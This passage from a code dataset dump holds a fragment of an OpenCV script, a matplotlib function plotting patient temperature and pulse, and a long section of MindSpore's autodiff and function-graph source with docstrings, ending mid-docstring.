ord('q'):\n\t\tbreak\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"crashoverloaded/Opencv_Days","sub_path":"Day5/image_gradients.py","file_name":"image_gradients.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"5447584398","text":"import matplotlib.pyplot as plt\r\nfrom mpl_toolkits.axes_grid1 import host_subplot\r\n\r\n# plot drawing & update\r\ndef draw_plot(data):\r\n\r\n print(type(data))\r\n for r in data:\r\n for k in r:\r\n print(k)\r\n\r\n plt.style.use('dark_background')\r\n\r\n host = host_subplot(111)\r\n\r\n par = host.twinx()\r\n\r\n host.set_ylabel(\"Temp.\", c=\"red\")\r\n par.set_ylabel(\"Pulse\", c=\"blue\")\r\n host.spines['left'].set_color(\"red\")\r\n par.spines['right'].set_color(\"blue\")\r\n\r\n y_temp = []\r\n y_pulse = []\r\n x = []\r\n x_ticks = []\r\n i = 0\r\n\r\n for r in data:\r\n print(r[5])\r\n y_temp.append(r[5])\r\n print(r[6])\r\n y_pulse.append(r[6])\r\n x.append(i)\r\n i += 1\r\n record = \"day \" + str(r[3]) + \", \" + str(r[2])\r\n x_ticks.append(record)\r\n\r\n plt.xticks(x, x_ticks, rotation=10)\r\n\r\n print(y_temp)\r\n print(y_pulse)\r\n p1 = host.scatter(x, y_temp, c=\"red\", label=\"Temp.\")\r\n p2 = par.scatter(x, y_pulse, c=\"blue\", label=\"Pulse\")\r\n\r\n return x_ticks\r\n\r\n","repo_name":"KonradHolewka/Hospi_App","sub_path":"plotdraw.py","file_name":"plotdraw.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"22684848844","text":"from __future__ import absolute_import\nfrom functools import partial\n\nfrom types import FunctionType, MethodType\nimport mindspore as ms\nfrom mindspore import context\nfrom mindspore.common.parameter import Parameter, ParameterTuple\nfrom mindspore.parallel._utils import _grads_divided_by_device_num_if_recomputation\nfrom mindspore._c_expression import GradOperation_, HyperMap_, Map_, MultitypeFuncGraph_, Tail_, \\\n TupleAdd_, UnpackCall_, ZipOperation_, ListAppend_, TupleGetItemTensor_, ListInsert_, \\\n SequenceSliceGetItem_, ListSliceSetItem_, VmapOperation_, TaylorOperation_, ListPop_, \\\n ListClear_, ListReverse_, ListExtend_, DictClear_, DictHasKey_, DictUpdate_, DictFromKeys_, \\\n ZerosLike_, TensorIndexGetitem_, TensorIndexSetitem_, ListAdd_\nfrom mindspore.common import dtype as mstype\nfrom mindspore.common.api import jit, _pynative_executor, _wrap_func\nfrom mindspore.common.api import _add_flags, _core\nfrom mindspore.ops.primitive import Primitive\nfrom mindspore.ops import signature as sig\n\n__all__ = [TupleAdd_, ListAdd_, UnpackCall_, TupleGetItemTensor_, SequenceSliceGetItem_,\n ListSliceSetItem_, ZerosLike_, TensorIndexGetitem_, TensorIndexSetitem_]\n\n\ndef add_flags(fn=None, **flags):\n \"\"\"\n A decorator that adds a flag to the function.\n\n Note:\n Only supports bool value.\n\n Args:\n fn (Function): Function or cell to add flag. Default: ``None`` .\n flags (dict): Flags use kwargs. Default: ``None`` .\n\n Returns:\n Function, the function with added flags.\n\n Examples:\n >>> net = Net();\n >>> net = add_flags(net, predit=True)\n >>> print(hasattr(net, '_func_graph_flags'))\n True\n \"\"\"\n\n return _add_flags(fn, **flags)\n\n\ndef core(fn=None, **flags):\n \"\"\"\n A decorator that adds a flag to the function.\n\n By default, the function is marked as True, enabling to use this decorator to\n set flag to a graph.\n\n Args:\n fn (Function, optional): Function to add flag. Default: ``None`` .\n flags (dict, optional): The following flags can be set core, which indicates that this is a core function or\n other flag. Default: ``None`` .\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> net = Net()\n >>> net = core(net, predit=True)\n >>> print(hasattr(net, '_func_graph_flags'))\n True\n \"\"\"\n\n return _core(fn, **flags)\n\n\ndef _get_grad_weights_id(weights=None):\n \"\"\"generate id of parameters\"\"\"\n res = \"\"\n if isinstance(weights, Parameter):\n res = weights.name + str(weights.requires_grad)\n if isinstance(weights, ParameterTuple):\n res = ''.join(item.name + str(item.requires_grad) for item in weights)\n if isinstance(weights, list):\n res = ''.join(item.name + str(item.requires_grad) for item in weights if isinstance(item, Parameter))\n return res\n\n\nclass GradOperation(GradOperation_):\n \"\"\"\n A higher-order function which is used to generate the gradient function for the input function.\n\n The gradient function generated by `GradOperation` higher-order function can be customized by\n construction arguments.\n\n For example, given an input function `net = Net()` that takes `x` and `y` as inputs, and has a parameter `z`,\n see `Net` in Examples.\n\n - Used to get the derivative of the input:\n\n 1. Returns gradients with respect to the first input (see `GradNetWrtX` in Examples).\n\n 1) Construct a `GradOperation` higher-order function with default arguments: `grad_op = GradOperation()`.\n\n 2) Call it with input function as argument to get the gradient function: `gradient_function = grad_op(net)`.\n\n 3) Call the gradient function with input function's inputs to get the gradients with respect to the first\n input: `grad_op(net)(x, y)`.\n\n 2. Returns gradients with respect to all inputs (see `GradNetWrtXY` in Examples).\n\n 1) Construct a `GradOperation` higher-order function with `get_all=True` which indicates getting gradients\n with respect to all inputs, they are `x` and `y` in example function `Net()`:\n `grad_op = GradOperation(get_all=True)`.\n\n 2) Call it with input function as argument to get the gradient function: `gradient_function = grad_op(net)`.\n\n 3) Call the gradient function with input function's inputs to get the gradients with respect to all inputs:\n `gradient_function(x, y)`.\n\n - Used to get the derivative of the parameters:\n\n Returns gradients with respect to given parameters (see `GradNetWithWrtParams` in Examples).\n\n 1. Construct a `GradOperation` higher-order function with `get_by_list=True`:\n `grad_op = GradOperation(get_by_list=True)`.\n\n 2. Construct a `ParameterTuple` that will be passed to the input function when constructing\n `GradOperation` higher-order function, it will be used as a parameter filter that determine\n which gradient to return: `params = ParameterTuple(net.trainable_params())`.\n\n 3. Call it with input function and `params` as arguments to get the gradient function:\n `gradient_function = grad_op(net, params)`.\n\n 4. Call the gradient function with input function's inputs to get the gradients with\n respect to given parameters: `gradient_function(x, y)`.\n\n - Used to get the derivative of the inputs and parameters at the same time:\n Returns gradients with respect to all inputs and given parameters in the format of ((dx, dy), (dz))\n (see `GradNetWrtInputsAndParams` in Examples).\n\n 1. Construct a `GradOperation` higher-order function with `get_all=True` and `get_by_list=True`:\n `grad_op = GradOperation(get_all=True, get_by_list=True)`.\n\n 2. Construct a `ParameterTuple` that will be passed along input function when constructing\n `GradOperation` higher-order function: `params = ParameterTuple(net.trainable_params())`.\n\n 3. Call it with input function and `params` as arguments to get the gradient function:\n `gradient_function = grad_op(net, params)`.\n\n 4. Call the gradient function with input function's inputs to get the gradients with respect to\n all inputs and given parameters: `gradient_function(x, y)`.\n\n - We can configure the sensitivity(gradient with respect to output) by setting `sens_param` as True and\n passing an extra sensitivity input to the gradient function, the sensitivity input should has the\n same shape and type with input function's output(see `GradNetWrtXYWithSensParam` in Examples).\n\n 1. Construct a `GradOperation` higher-order function with `get_all=True` and `sens_param=True`:\n `grad_op = GradOperation(get_all=True, sens_param=True)`.\n\n 2. Define `grad_wrt_output` as `sens_param` which works as the gradient with respect to output:\n `grad_wrt_output = Tensor(np.ones([2, 2]).astype(np.float32))`.\n\n 3. Call it with input function as argument to get the gradient function: `gradient_function = grad_op(net)`.\n\n 4. Call the gradient function with input function's inputs and `sens_param` to\n get the gradients with respect to all inputs: `gradient_function(x, y, grad_wrt_output)`.\n\n Note:\n For above gradient functions, the returned gradient result may vary for grad result element number:\n\n - Return a single value if only one result.\n - Return a tuple for multiple results.\n - Return an empty tuple for no result.\n\n Args:\n get_all (bool): If ``True`` , get all the gradients with respect to inputs. Default: ``False`` .\n get_by_list (bool): If ``True`` , get all the gradients with respect to Parameter free variables.\n If get_all and get_by_list are both ``False`` , get the gradient with respect to first input.\n If get_all and get_by_list are both ``True`` , get the gradients with respect to inputs and\n Parameter free variables at the same time in the form of (\"gradients with respect to inputs\",\n \"gradients with respect to parameter free variables\"). Default: ``False`` .\n sens_param (bool): Whether to append sensitivity (gradient with respect to output) as input.\n If sens_param is ``False`` , a 'ones_like(outputs)' sensitivity will be attached automatically.\n Default: ``False`` .\n If the sensor_param is ``True`` , a sensitivity (gradient with respect to output) needs to be transferred\n through the location parameter or key-value pair parameter. If the value is transferred through\n the key-value pair parameter, the key must be sens.\n\n Returns:\n The higher-order function which takes a function as argument and returns gradient function for it.\n\n Raises:\n TypeError: If `get_all`, `get_by_list` or `sens_param` is not a bool.\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> import mindspore\n >>> import numpy as np\n >>> from mindspore import dtype as mstype\n >>> from mindspore import Tensor, ops, nn, Parameter\n >>> class Net(nn.Cell):\n ... def __init__(self):\n ... super(Net, self).__init__()\n ... self.matmul = ops.MatMul()\n ... self.z = Parameter(Tensor(np.array([1.0], np.float32)), name='z')\n ... def construct(self, x, y):\n ... x = x * self.z\n ... out = self.matmul(x, y)\n ... return out\n ...\n >>> class GradNetWrtX(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtX, self).__init__()\n ... self.net = net\n ... self.grad_op = ops.GradOperation()\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net)\n ... return gradient_function(x, y)\n ...\n >>> x = Tensor([[0.5, 0.6, 0.4], [1.2, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.01, 0.3, 1.1], [0.1, 0.2, 1.3], [2.1, 1.2, 3.3]], dtype=mstype.float32)\n >>> output = GradNetWrtX(Net())(x, y)\n >>> print(output)\n [[1.4100001 1.5999999 6.6 ]\n [1.4100001 1.5999999 6.6 ]]\n >>>\n >>> class GradNetWrtXY(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtXY, self).__init__()\n ... self.net = net\n ... self.grad_op = ops.GradOperation(get_all=True)\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net)\n ... return gradient_function(x, y)\n >>>\n >>> x = Tensor([[0.8, 0.6, 0.2], [1.8, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.1, 3.3, 1.1], [1.1, 0.2, 1.4], [1.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWrtXY(Net())(x, y)\n >>> print(output)\n (Tensor(shape=[2, 3], dtype=Float32, value=\n [[ 4.50000000e+00, 2.70000005e+00, 3.60000014e+00],\n [ 4.50000000e+00, 2.70000005e+00, 3.60000014e+00]]), Tensor(shape=[3, 3], dtype=Float32, value=\n [[ 2.59999990e+00, 2.59999990e+00, 2.59999990e+00],\n [ 1.89999998e+00, 1.89999998e+00, 1.89999998e+00],\n [ 1.30000007e+00, 1.30000007e+00, 1.30000007e+00]]))\n >>>\n >>> class GradNetWrtXYWithSensParam(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtXYWithSensParam, self).__init__()\n ... self.net = net\n ... self.grad_op = ops.GradOperation(get_all=True, sens_param=True)\n ... self.grad_wrt_output = Tensor([[0.1, 0.6, 0.2], [0.8, 1.3, 1.1]], dtype=mstype.float32)\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net)\n ... return gradient_function(x, y, self.grad_wrt_output)\n >>>\n >>> x = Tensor([[0.8, 0.6, 0.2], [1.8, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.11, 3.3, 1.1], [1.1, 0.2, 1.4], [1.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWrtXYWithSensParam(Net())(x, y)\n >>> print(output)\n (Tensor(shape=[2, 3], dtype=Float32, value=\n [[ 2.21099997e+00, 5.09999990e-01, 1.49000001e+00],\n [ 5.58800030e+00, 2.68000007e+00, 4.07000017e+00]]), Tensor(shape=[3, 3], dtype=Float32, value=\n [[ 1.51999998e+00, 2.81999993e+00, 2.14000010e+00],\n [ 1.09999990e+00, 2.04999995e+00, 1.54999995e+00],\n [ 9.00000036e-01, 1.54999995e+00, 1.25000000e+00]]))\n >>>\n >>> class GradNetWithWrtParams(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWithWrtParams, self).__init__()\n ... self.net = net\n ... self.params = ParameterTuple(net.trainable_params())\n ... self.grad_op = ops.GradOperation(get_by_list=True)\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net, self.params)\n ... return gradient_function(x, y)\n >>>\n >>> x = Tensor([[0.8, 0.6, 0.2], [1.8, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.11, 3.3, 1.1], [1.1, 0.2, 1.4], [1.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWithWrtParams(Net())(x, y)\n >>> print(output)\n (Tensor(shape=[1], dtype=Float32, value= [ 2.15359993e+01]),)\n >>>\n >>> class GradNetWrtInputsAndParams(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtInputsAndParams, self).__init__()\n ... self.net = net\n ... self.params = ParameterTuple(net.trainable_params())\n ... self.grad_op = ops.GradOperation(get_all=True, get_by_list=True)\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net, self.params)\n ... return gradient_function(x, y)\n >>>\n >>> x = Tensor([[0.1, 0.6, 1.2], [0.5, 1.3, 0.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.12, 2.3, 1.1], [1.3, 0.2, 2.4], [0.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWrtInputsAndParams(Net())(x, y)\n >>> print(output)\n ((Tensor(shape=[2, 3], dtype=Float32, value=\n [[ 3.51999998e+00, 3.90000010e+00, 2.59999990e+00],\n [ 3.51999998e+00, 3.90000010e+00, 2.59999990e+00]]), Tensor(shape=[3, 3], dtype=Float32, value=\n [[ 6.00000024e-01, 6.00000024e-01, 6.00000024e-01],\n [ 1.89999998e+00, 1.89999998e+00, 1.89999998e+00],\n [ 1.30000007e+00, 1.30000007e+00, 1.30000007e+00]])), (Tensor(shape=[1], dtype=Float32, value=\n [ 1.29020004e+01]),))\n \"\"\"\n\n def __init__(self, get_all=False, get_by_list=False, sens_param=False):\n \"\"\"Initialize GradOperation.\"\"\"\n if not isinstance(get_all, bool):\n raise TypeError(f\"For 'GradOperation', the 'get_all' should be bool, but got {type(get_all).__name__}\")\n if not isinstance(get_by_list, bool):\n raise TypeError(f\"For 'GradOperation', the 'get_by_list' should be bool, \"\n f\"but got {type(get_by_list).__name__}\")\n if not isinstance(sens_param, bool):\n raise TypeError(f\"For 'GradOperation', the 'sens_param' should be bool, \"\n f\"but got {type(sens_param).__name__}\")\n self.get_all = get_all\n self.get_by_list = get_by_list\n self.sens_param = sens_param\n GradOperation_.__init__(self, 'grad', get_all, get_by_list, sens_param, False, False, False, False)\n self.grad_fn = None\n self.fn = None\n self.weights_id = None\n self.pynative_ = False\n self.grad_position = (0,)\n\n def __call__(self, fn, weights=None):\n weights_id = _get_grad_weights_id(weights)\n if self.grad_fn is not None and self.fn == fn and self.weights_id == weights_id:\n return self.grad_fn\n grad_ = GradOperation(self.get_all, self.get_by_list, self.sens_param)\n # If calling Grad in GRAPH_MODE or calling Grad in functions decorated with 'jit', do grad in GRAPH_MODE\n # If calling Grad in pure PYNATIVE_MODE do grad in PYNATIVE_MODE\n # In pure PYNATIVE_MODE the out layer after_grad just used to set pynative flag for inner GradOperation.\n # In PYNATIVE_MODE calling Grad from functions decorated with 'jit', use the out layer after_grad do\n # grad in GRAPH_MODE.\n if context.get_context(\"mode\") == context.GRAPH_MODE:\n dynamic_shape_inputs = None\n if isinstance(fn, ms.nn.Cell):\n dynamic_shape_inputs = fn.get_inputs()\n fn.grad_ops_label = True\n if self.get_by_list:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args, **kwargs):\n return grad_(fn, weights)(*args, **kwargs)\n else:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args, **kwargs):\n return grad_(fn)(*args, **kwargs)\n elif self.pynative_:\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n\n @_wrap_func\n def after_grad(*args, **kwargs):\n self._pynative_forward_run(fn, grad_, weights, args, kwargs)\n _pynative_executor.grad(fn, grad_, weights, self.grad_position, *args, **kwargs)\n out = _pynative_executor()\n out = _grads_divided_by_device_num_if_recomputation(out)\n return out\n else:\n grad_.pynative_ = True\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n # after_grad of this branch can't use @jit, just directly call grad_\n if self.get_by_list:\n def after_grad(*args, **kwargs):\n return grad_(fn, weights)(*args, **kwargs)\n else:\n def after_grad(*args, **kwargs):\n return grad_(fn)(*args, **kwargs)\n\n self.grad_fn = after_grad\n self.fn = fn\n self.weights_id = weights_id\n return self.grad_fn\n\n def _pynative_forward_run(self, fn, grad, weights, args, kwargs):\n \"\"\" Pynative forward run to build grad graph. \"\"\"\n new_kwargs = kwargs\n if self.sens_param:\n if 'sens' not in kwargs.keys():\n args = args[:-1]\n else:\n new_kwargs = kwargs.copy()\n new_kwargs.pop('sens')\n if isinstance(fn, (FunctionType, MethodType)):\n if not _pynative_executor.check_run(grad, fn, weights, None, *args, **new_kwargs):\n _pynative_executor.set_grad_flag(True)\n _pynative_executor.new_graph(fn, *args, **new_kwargs)\n output = fn(*args, **new_kwargs)\n _pynative_executor.end_graph(fn, output, *args, **new_kwargs)\n else:\n # Check if fn have run already\n if not _pynative_executor.check_run(grad, fn, weights, None, *args, **new_kwargs):\n fn.set_grad()\n fn(*args, **new_kwargs)\n fn.set_grad(False)\n\n\nclass _TaylorOperation(TaylorOperation_):\n \"\"\"\n Generate the higher order derivatives function for the input function.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize TaylorOperation.\"\"\"\n TaylorOperation_.__init__(self, 'taylorgrad')\n self.grad_fn = None\n self.fn = None\n\n def __call__(self, fn):\n if self.grad_fn is not None and self.fn == fn:\n return self.grad_fn\n taylor_grad_ = _TaylorOperation()\n\n # If calling Grad in GRAPH_MODE or calling Grad in functions decorated with 'jit', do grad in GRAPH_MODE\n\n @jit\n def after_taylor_grad(*args):\n return taylor_grad_(fn)(*args)\n\n self.grad_fn = after_taylor_grad\n self.fn = fn\n return self.grad_fn\n\n\ndef _combine_weight(grad_position, weights, out, out_with_ids):\n \"\"\" Making resulting tuple for weight, when return_ids is set to True. \"\"\"\n weight_tuple = []\n position = 0\n if isinstance(weights, (list, ParameterTuple, tuple)) and grad_position:\n for weight in weights:\n weight_tuple.append((weight.name, out[1][position]))\n position += 1\n elif isinstance(weights, (list, ParameterTuple, tuple)):\n for weight in weights:\n weight_tuple.append((weight.name, out[position]))\n position += 1\n elif grad_position:\n weight_tuple.append(weights.name)\n weight_tuple.append(out[1])\n else:\n weight_tuple.append(weights.name)\n weight_tuple.append(out)\n if grad_position:\n out_with_ids.append(tuple(weight_tuple))\n else:\n out_with_ids = weight_tuple\n return out_with_ids\n\n\ndef _combine_position(grad_position, weights, out, out_with_ids):\n \"\"\" Making resulting tuple for position, when return_ids is set to True. \"\"\"\n position_tuple = []\n position = 0\n if grad_position == (0,) and weights is not None:\n position_tuple.append(0)\n position_tuple.append(out[0])\n elif grad_position == (0,):\n position_tuple.append(0)\n position_tuple.append(out)\n elif weights is not None:\n for index in grad_position:\n position_tuple.append((index, out[0][position]))\n position += 1\n else:\n for index in grad_position:\n position_tuple.append((index, out[position]))\n position += 1\n if weights:\n out_with_ids.append(tuple(position_tuple))\n else:\n out_with_ids = position_tuple\n return out_with_ids\n\n\ndef _combine_with_ids(grad_position, weights, out):\n \"\"\" Making resulting tuple, when return_ids is set to True. \"\"\"\n out_with_ids = []\n if grad_position:\n out_with_ids = _combine_position(\n grad_position, weights, out, out_with_ids)\n if weights is not None:\n out_with_ids = _combine_weight(\n grad_position, weights, out, out_with_ids)\n if not out_with_ids:\n raise ValueError(f\"output tuple should not be a empty tuple.\")\n return tuple(out_with_ids)\n\n\nclass _Grad(GradOperation_):\n \"\"\"\n A higher-order function which is used to generate the gradient function by position for the input function.\n \"\"\"\n\n def __init__(self, get_by_list=False, sens_param=False, get_by_position=False, has_aux=False, get_value=False,\n return_ids=False):\n \"\"\"Initialize _Grad.\"\"\"\n if not isinstance(get_by_position, bool):\n raise TypeError(f\"For '_Grad', the 'get_by_position' should be bool, \"\n f\"but got {type(get_by_position).__name__}\")\n if not isinstance(get_by_list, bool):\n raise TypeError(f\"For '_Grad', the 'get_by_list' should be bool, \"\n f\"but got {type(get_by_list).__name__}\")\n if not isinstance(sens_param, bool):\n raise TypeError(f\"For '_Grad', the 'sens_param' should be bool, \"\n f\"but got {type(sens_param).__name__}\")\n if not isinstance(has_aux, bool):\n raise TypeError(f\"For '_Grad', the 'has_aux' should be bool, \"\n f\"but got {type(has_aux).__name__}\")\n if not isinstance(get_value, bool):\n raise TypeError(f\"For '_Grad', the 'get_value' should be bool, \"\n f\"but got {type(get_value).__name__}\")\n if not isinstance(return_ids, bool):\n raise TypeError(f\"For '_Grad', the 'return_ids' should be bool, \"\n f\"but got {type(return_ids).__name__}\")\n self.get_by_position = get_by_position\n self.get_by_list = get_by_list\n self.sens_param = sens_param\n self.has_aux = has_aux\n self.get_value = get_value\n self.return_ids = return_ids\n GradOperation_.__init__(self, 'grad', False, get_by_list, sens_param, get_by_position, has_aux, get_value,\n return_ids)\n self.grad_fn = None\n self.fn = None\n self.pynative_ = False\n self.grad_position = None\n self.weights_id = None\n\n def __call__(self, fn, weights=None, grad_position=0):\n weights_id = _get_grad_weights_id(weights)\n if self.grad_fn is not None and self.fn == fn and self.grad_position == grad_position and \\\n self.weights_id == weights_id:\n return self.grad_fn\n\n def aux_fn(*args):\n outputs = fn(*args)\n if not isinstance(outputs, tuple) or len(outputs) < 2:\n raise ValueError(\"When has_aux is True, origin fn requires more than one outputs.\")\n res = (outputs[0],)\n stop_gradient = Primitive(\"StopGradient\")\n for item in outputs[1:]:\n res += (stop_gradient(item),)\n return res\n\n grad_ = _Grad(self.get_by_list, self.sens_param, self.get_by_position, self.has_aux, self.get_value,\n self.return_ids)\n # If calling Grad in GRAPH_MODE or calling Grad in functions decorated with 'jit', do grad in GRAPH_MODE\n # If calling Grad in pure PYNATIVE_MODE do grad in PYNATIVE_MODE\n # In pure PYNATIVE_MODE the out layer after_grad just used to set pynative flag for inner GradOperation.\n # In PYNATIVE_MODE calling Grad from functions decorated with 'jit', use the out layer after_grad do\n # grad in GRAPH_MODE.\n if context.get_context(\"mode\") == context.GRAPH_MODE:\n dynamic_shape_inputs = None\n if isinstance(fn, ms.nn.Cell):\n dynamic_shape_inputs = fn.get_inputs()\n if self.get_by_position:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args):\n return grad_(fn, weights, grad_position)(*args)\n else:\n if self.get_by_list:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args):\n return grad_(fn, weights)(*args)\n else:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args):\n return grad_(fn)(*args)\n elif self.pynative_:\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n\n @_wrap_func\n def after_grad(*args, **kwargs):\n res = self._pynative_forward_run(fn, grad_, weights, args, kwargs)\n _pynative_executor.grad(fn, grad_, weights, grad_position, *args, **kwargs)\n out = _pynative_executor()\n out = _grads_divided_by_device_num_if_recomputation(out)\n if self.return_ids and out:\n out = _combine_with_ids(grad_position, weights, out)\n if self.get_value:\n return res, out\n if self.has_aux:\n return out, res[1:]\n return out\n else:\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n grad_.pynative_ = True\n fn_ = fn\n if self.has_aux:\n fn_ = aux_fn\n # after_grad of this branch can't use @jit, just directly call grad_\n if self.get_by_position:\n def after_grad(*args, **kwargs):\n return grad_(fn_, weights, grad_position)(*args, **kwargs)\n else:\n if self.get_by_list:\n def after_grad(*args, **kwargs):\n return grad_(fn_, weights)(*args, **kwargs)\n else:\n def after_grad(*args, **kwargs):\n return grad_(fn_)(*args, **kwargs)\n\n self.grad_fn = after_grad\n self.fn = fn\n self.grad_position = grad_position\n self.weights_id = weights_id\n return self.grad_fn\n\n def _pynative_forward_run(self, fn, grad, weights, args, kwargs):\n \"\"\" Pynative forward runs to build grad graph. \"\"\"\n new_kwargs = kwargs\n outputs = ()\n if self.sens_param:\n if 'sens' in kwargs.keys():\n new_kwargs = kwargs.copy()\n new_kwargs.pop('sens')\n else:\n args = args[:-1]\n if isinstance(fn, (FunctionType, MethodType)):\n if not _pynative_executor.check_run(grad, fn, weights, self.grad_position, *args, **new_kwargs):\n _pynative_executor.set_grad_flag(True)\n _pynative_executor.new_graph(fn, *args, **new_kwargs)\n outputs = fn(*args, **new_kwargs)\n _pynative_executor.end_graph(fn, outputs, *args, **new_kwargs)\n return outputs\n else:\n # Check if fn has run already.\n if not _pynative_executor.check_run(grad, fn, weights, self.grad_position, *args, **new_kwargs):\n fn.set_grad()\n outputs = fn(*args, **new_kwargs)\n fn.set_grad(False)\n return outputs\n if (self.get_value or self.has_aux) and not outputs:\n outputs = fn(*args, **new_kwargs)\n return outputs\n\n\nclass _Vmap(VmapOperation_):\n \"\"\"\n A higher-order function which is used to generate the vectorizing map function.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize _Vmap.\"\"\"\n VmapOperation_.__init__(self, 'vmap')\n self.vmap_fn = None\n self.fn = None\n self.in_axes = None\n self.out_axes = None\n\n def __call__(self, fn, in_axes=0, out_axes=0):\n if self.vmap_fn is not None and self.fn == fn and self.in_axes == in_axes and self.out_axes == out_axes:\n return self.vmap_fn\n\n vmap_ = self\n\n @jit\n def after_vmap(*args, **kwargs):\n return vmap_(fn, in_axes, out_axes)(*args, **kwargs)\n\n self.vmap_fn = after_vmap\n self.fn = fn\n self.in_axes = in_axes\n self.out_axes = out_axes\n return self.vmap_fn\n\n\nclass MultitypeFuncGraph(MultitypeFuncGraph_):\n \"\"\"\n MultitypeFuncGraph is a class used to generate overloaded functions, considering different types as inputs.\n Initialize an `MultitypeFuncGraph` object with name, and use `register` with input types as the decorator\n for the function to be registered. And the object can be called with different types of inputs,\n and work with `HyperMap` and `Map`.\n\n Args:\n name (str): Operator name.\n read_value (bool, optional): If the registered function do not need to set value on Parameter,\n and all inputs will pass by value, set `read_value` to ``True`` . Default: ``False`` .\n\n Raises:\n ValueError: If failed to find a matching function for the given arguments.\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> # `add` is a metagraph object which will add two objects according to\n >>> # input type using \".register\" decorator.\n >>> from mindspore import Tensor\n >>> from mindspore import ops\n >>> from mindspore import dtype as mstype\n >>> import mindspore.ops as ops\n >>>\n >>> tensor_add = ops.Add()\n >>> add = ops.MultitypeFuncGraph('add')\n >>> @add.register(\"Number\", \"Number\")\n ... def add_scala(x, y):\n ... return x + y\n >>> @add.register(\"Tensor\", \"Tensor\")\n ... def add_tensor(x, y):\n ... return tensor_add(x, y)\n >>> output = add(1, 2)\n >>> print(output)\n 3\n >>> output = add(Tensor([0.1, 0.6, 1.2], dtype=mstype.float32), Tensor([0.1, 0.6, 1.2], dtype=mstype.float32))\n >>> print(output)\n [0.2 1.2 2.4]\n \"\"\"\n\n def __init__(self, name, read_value=False, need_raise=False):\n \"\"\"Initialize MultitypeFuncGraph.\"\"\"\n MultitypeFuncGraph_.__init__(self, name, need_raise)\n self.entries = list()\n if read_value:\n self.set_signatures((\n sig.make_sig('args', sig.sig_rw.RW_READ, sig.sig_kind.KIND_VAR_POSITIONAL),))\n\n def __call__(self, *args):\n if len(self.entries) == 1:\n output = self.entries[0][1](*args)\n return output\n types = tuple(map(mstype.get_py_obj_dtype, args))\n for sigs, fn in self.entries:\n if len(sigs) != len(types):\n continue\n if any(not mstype._issubclass_(type_, sig) for sig, type_ in zip(sigs, types)): # pylint: disable=W0212\n continue\n output = fn(*args)\n return output\n raise ValueError(f\"For 'MultitypeFuncGraph', cannot find fn match given args. Got (sigs, fn): {self.entries}, \"\n f\"and (dtype, args): {types}.\")\n\n def register(self, *type_names):\n \"\"\"\n Register a function for the given type string.\n\n Args:\n type_names (Union[str, :class:`mindspore.dtype`]): Inputs type names or types list.\n\n Return:\n decorator, a decorator to register the function to run, when called under the\n types described in `type_names`.\n \"\"\"\n\n def deco(fn):\n def convert_type(type_input):\n if isinstance(type_input, str):\n return mstype.typing.str_to_type(type_input)\n if not isinstance(type_input, mstype.Type):\n raise TypeError(f\"For 'MultitypeFuncGraph', register only support str or {mstype.Type}, but got \"\n f\"'type_input': {type_input}.\")\n return type_input\n\n types = tuple(map(convert_type, type_names))\n self.register_fn(type_names, fn)\n self.entries.append((types, fn))\n return fn\n\n return deco\n\n # pylint: disable=missing-docstring\n def set_doc_url(self, doc_url):\n self.set_doc_url_(doc_url)\n\n\nclass HyperMap(HyperMap_):\n \"\"\"\n Hypermap will apply the set operation to input sequences.\n\n Apply the operations to every element of the sequence or nested sequence. Different\n from `mindspore.ops.Map`, the `HyperMap` supports to apply on nested structure.\n\n Args:\n ops (Union[MultitypeFuncGraph, None]): `ops` is the operation to apply. If `ops` is `None`,\n the operations should be put in the first input of the instance. Default is None.\n reverse (bool): The optimizer needs to be inverted in some scenarios to improve parallel performance,\n general users please ignore. `reverse` is the flag to decide if apply the operation reversely.\n Only supported in graph mode. Default is False.\n\n Inputs:\n - **args** (Tuple[sequence]) -\n\n - If `ops` is not `None`, all the inputs should be sequences with the same length.\n And each row of the sequences will be the inputs of the operation.\n - If `ops` is `None`, the first input is the operation, and the others are inputs.\n\n Note:\n Except for the operation input, the number of inputs should be equal to the number of inputs to `ops`.\n\n Outputs:\n Sequence or nested 